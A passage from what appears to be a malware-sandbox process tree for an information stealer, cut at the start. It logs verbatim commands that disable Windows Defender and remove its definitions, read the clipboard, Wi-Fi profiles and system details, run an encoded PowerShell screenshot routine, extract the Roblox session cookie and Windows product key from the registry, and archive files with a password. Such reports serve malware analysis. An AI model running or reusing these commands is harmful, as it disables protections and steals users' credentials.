                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:644
                                                                                                                • C:\Users\Admin\AppData\upinstall.exe
                                                                                                                  C:\Users\Admin\AppData\upinstall.exe
                                                                                                                  8⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4868
                                                                                                                  • C:\Users\Admin\AppData\upinstall.exe
                                                                                                                    C:\Users\Admin\AppData\upinstall.exe
                                                                                                                    9⤵
                                                                                                                    • Drops file in Drivers directory
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:4880
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\upinstall.exe'"
                                                                                                                      10⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:4392
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\upinstall.exe'
                                                                                                                        11⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3012
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                      10⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:1432
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                        11⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1672
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                      10⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:2496
                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                        tasklist /FO LIST
                                                                                                                        11⤵
                                                                                                                        • Enumerates processes with tasklist
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4404
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                      10⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:4356
                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                        tasklist /FO LIST
                                                                                                                        11⤵
                                                                                                                        • Enumerates processes with tasklist
                                                                                                                        PID:1540
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                      10⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:2244
                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                        11⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3464
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                      10⤵
                                                                                                                      • Clipboard Data
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:1952
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell Get-Clipboard
                                                                                                                        11⤵
                                                                                                                        • Clipboard Data
                                                                                                                        PID:4140
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                      10⤵
                                                                                                                        PID:4852
                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                          tasklist /FO LIST
                                                                                                                          11⤵
                                                                                                                          • Enumerates processes with tasklist
                                                                                                                          PID:4376
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                        10⤵
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:3800
                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                          tree /A /F
                                                                                                                          11⤵
                                                                                                                            PID:3548
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                          10⤵
                                                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                          PID:1532
                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                            netsh wlan show profile
                                                                                                                            11⤵
                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                            PID:3824
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                          10⤵
                                                                                                                            PID:744
                                                                                                                            • C:\Windows\system32\systeminfo.exe
                                                                                                                              systeminfo
                                                                                                                              11⤵
                                                                                                                              • Gathers system information
                                                                                                                              PID:3756
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                            10⤵
                                                                                                                              PID:3564
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                11⤵
                                                                                                                                  PID:4340
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                10⤵
                                                                                                                                  PID:3680
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                    11⤵
                                                                                                                                      PID:2356
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2hu0yjik\2hu0yjik.cmdline"
                                                                                                                                        12⤵
                                                                                                                                          PID:2264
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFDC.tmp" "c:\Users\Admin\AppData\Local\Temp\2hu0yjik\CSCDA689B33DE85430A80BC72F3EC26C022.TMP"
                                                                                                                                            13⤵
                                                                                                                                              PID:4864
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                        10⤵
                                                                                                                                          PID:3012
                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                            tree /A /F
                                                                                                                                            11⤵
                                                                                                                                              PID:4256
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                            10⤵
                                                                                                                                              PID:4032
                                                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                                                attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                11⤵
                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                PID:3500
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                              10⤵
                                                                                                                                                PID:3776
                                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                  11⤵
                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:3932
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                10⤵
                                                                                                                                                  PID:2036
                                                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                                                    tree /A /F
                                                                                                                                                    11⤵
                                                                                                                                                      PID:5052
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                    10⤵
                                                                                                                                                      PID:3996
                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                        tasklist /FO LIST
                                                                                                                                                        11⤵
                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                        PID:4464
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                      10⤵
                                                                                                                                                        PID:3752
                                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                                          tree /A /F
                                                                                                                                                          11⤵
                                                                                                                                                            PID:2656
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                          10⤵
                                                                                                                                                            PID:1328
                                                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                                                              tree /A /F
                                                                                                                                                              11⤵
                                                                                                                                                                PID:656
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                              10⤵
                                                                                                                                                                PID:3764
                                                                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                                                                  tree /A /F
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:2116
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:3348
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:1632
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:1868
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:2264
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48682\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\zR046.zip" *"
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:732
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI48682\rar.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\_MEI48682\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\zR046.zip" *
                                                                                                                                                                            11⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                            PID:3628
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:4900
                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                              wmic os get Caption
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:1460
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:4120
                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                  wmic computersystem get totalphysicalmemory
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:2592
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:1688
                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                      wmic csproduct get uuid
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:1492
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:4984
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                          11⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:4208
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:4908
                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                            wmic path win32_VideoController get name
                                                                                                                                                                                            11⤵
                                                                                                                                                                                            • Detects videocard installed
                                                                                                                                                                                            PID:64
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                          10⤵
                                                                                                                                                                                            PID:3500
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:1328
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\upinstall.exe
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:2244
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\updater.exe
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:3196
                                                                                                                                                                                            • C:\Users\Admin\AppData\updater.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\updater.exe
